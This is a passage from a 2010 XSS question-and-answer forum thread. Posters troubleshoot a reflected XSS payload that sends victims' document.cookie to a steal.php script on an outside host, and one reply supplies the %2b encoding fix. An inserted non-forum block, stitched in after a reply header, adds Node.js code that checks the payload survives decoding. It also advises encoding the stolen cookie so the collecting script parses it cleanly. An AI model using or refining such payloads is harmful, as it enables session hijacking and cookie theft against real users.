Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
What's wrong?
Posted by: Lofet
Date: March 27, 2010 09:22AM

I'm inputting the following code into a vulnerable website:

"><script>window.location = 'http://mysite.com/steal.php?cookie='+document.cookie;</script>

However the following works fine:

"><script>window.location = 'http://attacker.com/steal.php?cookie='</script>

It seems to be a problem with the +document.cookie; bit and I have no clue what's wrong with it, any help?

Re: What's wrong?
Posted by: Reiners
Date: March 27, 2010 09:28AM

urlencode the + to %2b if you use GET

Re: What's wrong?
Posted by: Lofet
Date: March 27, 2010 10:18AM

Worked, thank you. :)

Re: What's wrong?
Posted by: michee
Date: July 09, 2010 01:22AM

Sorry to bring this up, guys, but I don't understand...
I also know that there were a few threads about this; I've read them...

Why does this have to be encoded, as I do not need a literal '+' in the URL?
Shouldn't this '+' just do a simple concatenation of two strings in JavaScript?
So that you would then be redirected to the resulting URL string, like this:

document.location = attackers_location_With_cookie_added;


I have also used this encoding on an MS-SQL injection where I needed to concatenate two fields... but there I really needed to pass a literal '+' to the MS-SQL server...

Also, wouldn't it be better to run an escape on document.cookie? Just to make sure...

Re: What's wrong?
Posted by: PaPPy
Date: July 09, 2010 07:41AM

If you just use a + symbol, browsers interpret it as a space.
But if you put the actual URL-encoded value of a plus symbol, it will then combine the cookie and the URL.

http://www.xssed.com/archive/author=PaPPy/

Re: What's wrong?
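To make the explanation above concrete, here is an added example that is not part of the thread. It emulates what a server does with a GET parameter sent as application/x-www-form-urlencoded (a raw + becomes a space before percent-escapes are decoded), reflects the value unescaped into a hypothetical page, and then checks whether the injected script still parses. The vulnerable page markup, the helper names and the use of Node.js are assumptions made for the illustration; the two payloads are the ones from the first post, with the second one carrying the %2b that Reiners suggested.

```javascript
// Added example, not code from the thread: round-trip an XSS payload
// through form decoding and reflection, and test whether the injected
// JavaScript survives. Runs under Node.js with no dependencies.

// Form decoding as typical server frameworks do it: '+' becomes a space
// first, then percent-escapes are decoded.
function formDecode(value) {
  return decodeURIComponent(value.replace(/\+/g, ' '));
}

// Hypothetical vulnerable page (constructed for this example): the
// parameter is echoed into an attribute value without any encoding.
function renderVulnerablePage(q) {
  return '<input type="text" value="' + q + '">';
}

// Pull the body of the first <script> element out of the rendered HTML.
function extractScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/i.exec(html);
  return m ? m[1] : null;
}

// Does the injected script parse? Constructing a Function compiles the
// source without running it, so a SyntaxError here is the same failure
// the browser reports for the reflected payload.
function scriptParses(js) {
  try {
    new Function(js);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Full round trip: query-string value -> server decode -> reflection ->
// browser parse. Returns what the server saw, what landed in the page,
// and whether it is valid JavaScript.
function roundTrip(rawQueryValue) {
  const decoded = formDecode(rawQueryValue);
  const js = extractScript(renderVulnerablePage(decoded));
  return { decoded, js, parses: js !== null && scriptParses(js) };
}

// Payload exactly as typed into the URL bar with a raw '+' (fails).
const RAW_PLUS =
  '"><script>window.location = \'http://mysite.com/steal.php?cookie=\'+document.cookie;</script>';

// Same payload with the '+' percent-encoded (works).
const ENCODED_PLUS = RAW_PLUS.replace('+', '%2b');

// Encoding the whole value for the query string takes care of the '+'
// (and anything else that form decoding would mangle) automatically.
function encodedQueryValue(payload) {
  return encodeURIComponent(payload);
}

// Stand-alone demonstration.
for (const value of [RAW_PLUS, ENCODED_PLUS, encodedQueryValue(RAW_PLUS)]) {
  const r = roundTrip(value);
  console.log(r.parses ? 'PARSES  ' : 'BROKEN  ', r.js);
}
```

With the raw +, the script the browser sees is `window.location = 'http://mysite.com/steal.php?cookie=' document.cookie;`, which is a syntax error, so nothing runs and no redirect happens; with %2b the + comes back out of the decoder and the concatenation is intact. Encoding the whole payload with encodeURIComponent before it goes into the query string gives the same result without having to hunt for individual characters, and wrapping document.cookie in encodeURIComponent inside the payload, as michee asked about, keeps the semicolons and equals signs of the cookie from being mis-parsed by steal.php on the receiving side.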
Posted by: michee
Date: July 10, 2010 08:34AM

Yeah, but as you also said in another thread below, this is only true in the URL bar... right?

Oh, I got it now... but this is copied from the URL bar (actually passed to the server) and then echoed back in the HTML page... I got it now, thanks PaPPy! :)
